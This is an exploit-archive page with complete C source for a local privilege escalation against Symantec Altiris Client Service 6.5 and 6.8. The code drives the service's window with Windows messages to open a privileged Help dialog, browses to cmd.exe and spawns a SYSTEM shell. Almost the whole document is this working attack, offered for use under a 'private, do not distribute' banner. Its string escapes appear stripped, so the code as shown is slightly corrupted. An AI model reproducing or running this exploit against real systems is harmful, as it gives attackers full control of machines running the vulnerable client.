Symantec Altiris Client Service 6.8.378 Local Privilege Escalation Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Symantec Altiris Client Service 6.8.378 Local Privilege Escalation Exploit
# Published : 2008-05-15
# Author : Alex Hernandez
# Previous Title : VLC 0.8.6d SSA Parsing Double Sh311 Universal Exploit
# Next Title : Kantaris 0.3.4 SSA Subtitle Local Buffer Overflow Exploit
// 0day PRIVATE NOT DISTRIBUTE!!!
//
// Symantec Altiris Client Service Local Exploit (0day) 
//
// Affected Versions	: Altiris Client 6.5.248
//			  Altiris Client 6.5.299
//			  Altiris client 6.8.378
//
// Alex Hernandez aka alt3kx 
// ahernandez [at] sybsecurity.com
//
// Eduardo Vela aka sirdarckcat 
// sirdarckcat [at] gmail.com
//
// We'll see you soon at ph-neutral 0x7d8

#include "stdio.h"
#include "windows.h"

int main(int argc, char* argv[])
{
 HWND lHandle, lHandle2;
 POINT point;
 int id,a=0;
 char langH[255][255];
 char langO[255][255];
 char wname[]="Altiris Client Service";
 
 strcpy(langH[0x0c],"Aide de Windows");
 strcpy(langH[0x09],"Windows Help");
 strcpy(langH[0x0a],"Ayuda de Windows");
 
 strcpy(langO[0x0c],"Ouvrir");
 strcpy(langO[0x09],"Open");
 strcpy(langO[0x0a],"Abrir");
 
 printf("##########################################################n");
 printf("#                  Altiris Client Service                #n");
 printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit    #n");
 printf("# by sirdarckcat & alt3kx                                #n");
 printf("#                                                        #n");
 printf("# This exploit is based on www.milw0rm.com/exploits/350  #n");
 printf("# Utility Manager Privilege Elevation Exploit (MS04-019) #n");
 printf("# by Cesar Cerrudo                                       #n");
 printf("##########################################################nn");
  
 id=PRIMARYLANGID(GetSystemDefaultLangID());
 if (id==0 && (id=PRIMARYLANGID(GetUserDefaultLangID()))){
    printf("Lang not found, using englishn");
    id=9;
 }

 char sText[]="%windir%\system32\cmd.ex?";

 if (argc<2){
    printf("Use:n> %s [LANG-ID]nn",argv[0]);
    printf("Look for your LANG-ID here:n");
    printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspxn");
    printf("nAnyway, the program will try to guess it.nn");
    return 0;
 }else{
    if (argc==2){
       if (langH[atoi(argv[1])]){
          id=atoi(argv[1]);
          printf("Lang changedn");
       }else{
          printf("Lang not supportedn",id);
       }
    }
 }
 printf("Using Lang %dn",id);
 printf("Looking for %s..n",wname);
 lHandle=FindWindow(NULL, wname);   
 if (!lHandle) {
  printf("Window %s not foundn", wname);
  return 0;
 }else{
  printf("Found! exploiting..n");
 }
 PostMessage(lHandle,0x313,NULL,NULL);
 
 Sleep(100);

 SendMessage(lHandle,0x365,NULL,0x1);
 Sleep(300);
 pp:
 if (!FindWindow(NULL, langH[id])){
    printf("Help Window not found.. exploit unsuccesfuln");
    if (id!=9){
       printf("Trying with english..n");
       id=9;
       goto pp;
    }else{
          return 0;
    } 
 }else{
    printf("Help Window found! exploiting..n");
 } 
 SendMessage (FindWindow(NULL, langH[id]), WM_IME_KEYDOWN, VK_RETURN, 0);
 Sleep(500);
 lHandle = FindWindow("#32770",langO[id]);
 lHandle2 = GetDlgItem(lHandle, 0x47C);
 Sleep(500);
 printf("Sending path..n");
 SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
 Sleep(800);
 SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
 lHandle2 = GetDlgItem(lHandle, 0x4A0);
 printf("Looking for cmd..n"); 
 SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
 Sleep(500);
 lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
 lHandle2 = GetDlgItem(lHandle2, 0x1);
 printf("Sending keys..n");
 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0);
 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0);
 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0);
 Sleep(500);
 mark:
 PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
 Sleep(1000);
 point.x =10; point.y =30;
 lHandle2=WindowFromPoint(point);
  Sleep(1000);
 printf("Opening shell..n");
 SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
  Sleep(1000);
 SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
  Sleep(1000);
 SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0);
  Sleep(1000);
 if (!FindWindow(NULL,"C:\WINDOWS\system32\cmd.exe") && !FindWindow(NULL,"C:\WINNT\system32\cmd.exe")){
    printf("Failedn");
    if (!a){
        a++;
        goto mark;
    }
 }else{
       printf("Done!n");
 }
 if(!a){
    SendMessage (lHandle, WM_CLOSE,0,0);
    Sleep(500);
    SendMessage (FindWindow(NULL, langH[id]), WM_CLOSE, 0, 0);
    SendMessage (FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0);
 }else{
    printf("The exploit failed, but maybe the context window of the shell is visibile.n");
 }
 return 0;
}

// www.Syue.com [2008-05-15]